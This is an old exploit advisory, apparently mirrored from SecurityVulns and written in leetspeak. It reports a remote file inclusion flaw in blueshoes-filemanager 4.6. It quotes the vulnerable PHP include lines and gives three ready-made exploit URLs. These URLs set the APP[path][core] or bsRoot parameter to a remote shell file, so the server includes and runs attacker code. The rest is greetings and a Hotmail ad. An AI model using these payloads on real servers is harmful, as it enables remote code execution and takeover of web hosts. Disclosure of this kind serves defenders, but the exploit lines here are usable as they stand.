New Vunerability

2006-10-31T00:00:00
ID SECURITYVULNS:DOC:14870
Type securityvulns
Reporter Securityvulns
Modified 2006-10-31T00:00:00

Description

blueshoes-filemanager-4.6_public

$it£ :

www.blueshoes.org

Remote File Include Vulnerability (APP[path][core])

Auth0r : x_w0x

c0ntact : x_w0x[at]Hotmail[d0t]com

w£lc0m£ In x0|0x

=======================================================

C0d£ :

=====

./file.php require_once($APP['path']['core'] . 'util/Bs_UnitConverter.class.php'); require_once($APP['path']['core'] . 'net/http/Bs_Browscap.class.php')

-global.conf.php include_once($APP['path']['bsRoot'] . 'blueshoes.ini.php')

-viewer.php require_once($APP['path']['core'] 'file/Bs_FileSystem.class.php'); require_once($APP['path']['core'] . 'file/Bs_FileUtil.class.php')

£xpl0it:

=====

http://host.com/[path]/applications/flemanager/file.php?APP[path][core]=$h£ll.txt? http://host.com/[path]/applications/flemanager/global.conf.php?APP[path][bsRoot]=$h£ll.txt? http://host.com/[path]/applications/flemanager/viewer.php?APP[path][bsRoot]=$h£ll.txt?

Gr££tz : makoki , azzcoder ,xoron , osm@n $p£cial Gr££tz : str0k ,elite-team and all H4ck£r$ 0_°

Ramadan Karima all musulmano ^_*

Download :http://download.blueshoes.org/blueshoes-filemanager-4.6_public.zip


MSN Hotmail sur i-mode™ : envoyez et recevez des e-mails depuis votre téléphone portable ! http://www.msn.fr/hotmailimode/